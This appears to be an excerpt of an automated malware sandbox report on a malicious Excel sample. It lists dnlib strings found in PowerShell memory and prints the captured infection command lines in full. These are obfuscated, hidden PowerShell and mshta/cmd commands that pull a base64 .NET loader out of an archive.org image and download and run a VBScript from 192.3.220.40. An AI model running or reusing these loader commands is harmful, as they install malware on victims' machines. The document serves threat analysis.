                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\lkzgbmkm\lkzgbmkm.pdb source: powershell.exe, 00000014.00000002.494874589.0000000002853000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.pdbhP source: powershell.exe, 00000007.00000002.453491405.0000000002F60000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.pdb('D>'D 0'D_CorDllMainmscoree.dll source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\lkzgbmkm\lkzgbmkm.pdbhP source: powershell.exe, 00000014.00000002.494874589.0000000002F4C000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000E.00000002.548581450.000007FE89A08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.551416551.000007FE89BC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.597286727.000007FE89BD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.596399479.000007FE89A18000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.pdb source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.pdb source: powershell.exe, 00000007.00000002.453491405.0000000002F60000.00000004.00000800.00020000.00000000.sdmp
                    Source: 58430000.0.dr Initial sample: OLE indicators vbamacros = False
                    Source: QPS-36477.xls Initial sample: OLE indicators encrypted = True

                    Data Obfuscation

                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
                    Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
